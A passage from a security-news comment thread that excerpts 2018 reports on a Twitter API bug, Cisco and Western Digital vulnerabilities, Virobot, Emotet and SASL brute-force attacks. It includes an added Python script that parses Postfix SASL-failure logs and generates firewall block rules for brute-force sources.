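The distinct-username count is what separates stuffing from a locked-out user retrying one account: a real person fails a few times on the same name. The per-IP view is the easy case; a botnet of the size the articles describe spreads attempts across many addresses, so the complementary signal is global, the rate of failed logins across distinct usernames for the whole service in the same window, compared with its normal baseline.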
  38. Tomi Engdahl says:

    Bug Exposed Direct Messages of Millions of Twitter Users
    https://www.securityweek.com/millions-twitter-users-affected-information-exposure-flaw

    Millions of Twitter Users Affected by Information Exposure Flaw

    Twitter has patched a bug that may have caused direct messages to be sent to third-party developers other than the ones users interacted with. The problem existed for well over a year and it impacted millions of users.

    According to Twitter, the issue is related to the Account Activity API (AAAPI), which allows developers registered on the social network’s developer program to build tools designed to better support businesses and their customer communications on the platform.

    Reply
  39. Tomi Engdahl says:

    Cisco Removes Default Password From Video Surveillance Manager
    https://www.securityweek.com/cisco-removes-default-password-video-surveillance-manager

    A critical vulnerability recently patched in the Cisco Video Surveillance Manager (VSM) could allow an unauthenticated attacker to log in as root.

    The security flaw, Cisco revealed on Friday, impacts only the VSM software running on certain Connected Safety and Security Unified Computing System (UCS) platforms. The issue, the company says, resides in the presence of default, static credentials for the root account

    Reply
  40. Tomi Engdahl says:

    Industry Reactions to New National Cyber Strategy
    https://www.securityweek.com/industry-reactions-new-national-cyber-strategy

    The White House last week announced the release of the 2018 National Cyber Strategy, which outlines the government’s plans for ensuring the security of cyberspace.

    Described by officials as the “first fully articulated cyber strategy in 15 years,”

    Dave Weinstein, VP of Threat Research at Claroty:

    “Most government strategy documents tend to be underwhelming and this one is no different. This isn’t a whole lot of new content or ideas, but rather amplification, clarification, and renewal of previous ones.

    The paragraph that stands out to me is the one on the Cyber Deterrence Initiative. Until now we haven’t formally adopted an international approach to deterrence, which includes collaborating on incident response and attribution.

    On critical infrastructure, it’s encouraging to see it featured so prominently in the Strategy but the substance is a bit lacking

    Reply
  41. Tomi Engdahl says:

    New Virobot Ransomware and Botnet Emerge
    https://www.securityweek.com/new-virobot-ransomware-and-botnet-emerges

    Dubbed Virobot, the threat not only encrypts files on infected machines, but it also ensnares the system into a spam botnet and leverages it to spread itself to other victims.

    First discovered on September 17, 2018, Virobot checks compromised machines for the presence of specific registry keys to determine if the system should be encrypted.

  42. Tomi Engdahl says:

    Western Digital Releases Hotfix for My Cloud Auth Bypass Vulnerability
    https://www.bleepingcomputer.com/news/security/western-digital-releases-hotfix-for-my-cloud-auth-bypass-vulnerability/

    Western Digital has just released a hotfix firmware update to resolve the authentication bypass vulnerability (CVE-2018-17153) that had remained unpatched in My Cloud NAS devices for over a year.

    This vulnerability allowed anyone to bypass authentication and get administrative access to the router. Once an attacker gains access to a router, they can flash it with custom firmware, change DNS to point users to phishing sites, or perform other malicious activities.

  43. Tomi Engdahl says:

    The ‘Opsec Fail’ That Helped Unmask a North Korean State Hacker
    https://www.darkreading.com/threat-intelligence/the-opsec-fail-that-helped-unmask-a-north-korean-state-hacker-/d/d-id/1332870

    How Park Jin Hyok, charged by the US government with alleged computer crimes in the Sony, Bank of Bangladesh, and WannaCry cyberattacks, inadvertently blew his cover via email accounts.

  44. Tomi Engdahl says:

    Emotet on the rise with heavy spam campaign
    https://blog.malwarebytes.com/cybercrime/2018/09/emotet-rise-heavy-spam-campaign/

    The threat landscape is changing once again, now that the ocean of cryptocurrency miners has shrunk to a small lake. Over the last couple months, we’ve seen cybercriminals lean back on tried and true methods of financial theft and extortion, with the rise of a familiar Banking Trojan: Emotet.

  45. Tomi Engdahl says:

    Simple Authentication and Security Layer (SASL) vulnerabilities
    https://blog.malwarebytes.com/cybercrime/2018/09/simple-authentication-and-security-layer-sasl-vulnerabilities/

    Simple Authentication and Security Layer (SASL) is an authentication layer used in Internet protocols. SASL is not a protocol, but rather a framework that provides developers of applications and shared libraries with mechanisms for authentication, data integrity–checking, and encryption.

    Within the framework and a few of its plugins, there are a couple of known vulnerabilities that we want to make you aware of. Although patches have been issued, not everyone has implemented them.

    Most server administrators will recognize the acronym from this type of error message or report:

    “SASL LOGIN authentication failed: authentication failure”

    SASL attacks usually turn out to be brute force attacks, meaning an automated script or a bot is trying over and over to log into an existing email account on your server, trying many combinations of credentials to find a valid username and password pair. Thankfully, there are some countermeasures you can take against these attacks.

    If you have the option to make your server listen on a different port, doing so might make you a less likely target for new attacks.
    If the SASL message is from the same IP all the time, block that IP in your firewall.
    If the attackers keep coming at you from different IPs, there are software solutions that use machine learning to automatically block any new assailant. One caveat to this solution: Be vigilant about false positives so that you don’t shut out legitimate users, such as remote employees.

    SASL is a framework for application protocols, such as SMTP or IMAP, that adds authentication support. It checks whether the user has the proper permissions to use the server in the way they request. It also offers a framework for data integrity–checking and encryption.

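The countermeasures above (block a single noisy IP, or automatically block new attackers while watching for false positives) are what a fail2ban-style filter does. The following script is an added example, not code from the Malwarebytes post: it parses Postfix smtpd log lines for the "SASL ... authentication failed" warning quoted above, counts failures per source IP inside a sliding time window, honours an allowlist so that remote employees on known addresses are never blocked, and emits iptables rules for the rest. The log lines are constructed for the example; the year (syslog timestamps carry none), the threshold of 5 failures in 10 minutes and the allowlist are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample Postfix smtpd log lines for this example (not real server logs).
SAMPLE_LOG = """\
Sep 25 10:12:01 mail postfix/smtpd[12345]: warning: unknown[203.0.113.5]: SASL LOGIN authentication failed: authentication failure
Sep 25 10:12:02 mail postfix/smtpd[12345]: warning: unknown[203.0.113.5]: SASL LOGIN authentication failed: authentication failure
Sep 25 10:12:04 mail postfix/smtpd[12346]: warning: unknown[203.0.113.5]: SASL PLAIN authentication failed: authentication failure
Sep 25 10:12:05 mail postfix/smtpd[12347]: warning: unknown[203.0.113.5]: SASL LOGIN authentication failed: authentication failure
Sep 25 10:12:09 mail postfix/smtpd[12348]: warning: unknown[203.0.113.5]: SASL LOGIN authentication failed: authentication failure
Sep 25 10:13:00 mail postfix/smtpd[12350]: warning: host.example.net[198.51.100.7]: SASL LOGIN authentication failed: authentication failure
Sep 25 10:14:30 mail postfix/smtpd[12351]: warning: host.example.net[198.51.100.7]: SASL LOGIN authentication failed: authentication failure
Sep 25 10:15:00 mail postfix/smtpd[12352]: connect from host.example.net[198.51.100.7]
Sep 25 11:40:00 mail postfix/smtpd[12360]: warning: unknown[198.51.100.7]: SASL LOGIN authentication failed: authentication failure
"""

# Matches the Postfix warning line; captures syslog timestamp, client IP and SASL mechanism.
SASL_FAIL_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ postfix/smtpd\[\d+\]: "
    r"warning: \S+\[(?P<ip>[0-9A-Fa-f.:]+)\]: SASL (?P<mech>\w+) authentication failed"
)


def parse_sasl_failures(text, year=2018):
    """Return a list of (timestamp, ip, mechanism) for every SASL failure line.

    Syslog timestamps have no year, so one is supplied (assumed 2018 here).
    Lines that are not SASL failures (e.g. 'connect from') are ignored.
    """
    events = []
    for line in text.splitlines():
        m = SASL_FAIL_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["ip"], m["mech"]))
    return events


def brute_force_sources(events, threshold=5, window_seconds=600, allowlist=frozenset()):
    """Return {ip: time_threshold_was_hit} for IPs with >= threshold failures
    inside any sliding window of window_seconds (fail2ban's maxretry/findtime idea).

    IPs in allowlist are never flagged: this is the false-positive guard for
    known remote users who mistype a password a few times.
    """
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(list)  # ip -> failure timestamps still inside the window
    flagged = {}
    for ts, ip, _mech in sorted(events):
        if ip in allowlist:
            continue
        bucket = recent[ip]
        bucket.append(ts)
        # Expire failures older than the window before counting.
        while bucket and ts - bucket[0] > window:
            bucket.pop(0)
        if len(bucket) >= threshold and ip not in flagged:
            flagged[ip] = ts
    return flagged


def block_rules(flagged):
    """Render one iptables DROP rule per flagged source, in a stable order."""
    return [f"iptables -I INPUT -s {ip} -j DROP" for ip in sorted(flagged)]


if __name__ == "__main__":
    events = parse_sasl_failures(SAMPLE_LOG)
    hits = brute_force_sources(events, allowlist={"198.51.100.7"})
    for ip, when in hits.items():
        print(f"{ip}: threshold reached at {when.isoformat()}")
    print("\n".join(block_rules(hits)))
```

With the sample data, 203.0.113.5 (five failures in eight seconds) is flagged and 198.51.100.7 (three failures spread over 90 minutes) is not, which is the distinction the post is after: a burst from one source is a bot, a handful of failures over an afternoon is usually a person. Tune threshold and window to your own traffic before wiring the rules into a firewall, and keep the allowlist for addresses you cannot afford to lock out.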
  46. Tomi Engdahl says:

    Operator of ‘VirusTotal for criminals’ gets 14-year prison sentence
    https://www.cyberscoop.com/scan4you-ruslan-bondars-latvian-hacker-sentenced/

  47. Tomi Engdahl says:

    Twitter notifies users about API bug that shared DMs with wrong devs
    https://www.zdnet.com/article/twitter-notifies-developers-about-api-bug-that-shared-dms-with-wrong-devs/#ftag=RSSbaffb68

    Twitter said the API bug was active between May 2017 and early September 2018, for nearly 16 months.

  48. Tomi Engdahl says:

    Malware Disguised as Job Offers Distributed on Freelance Sites
    https://www.bleepingcomputer.com/news/security/malware-disguised-as-job-offers-distributed-on-freelance-sites/

    Attackers are using freelance job sites such as fiverr and Freelancer to distribute malware disguised as job offers. These job offers contain attachments that pretend to be the job brief, but are actually installers for keyloggers such as Agent Tesla or Remote Access Trojans (RATs).
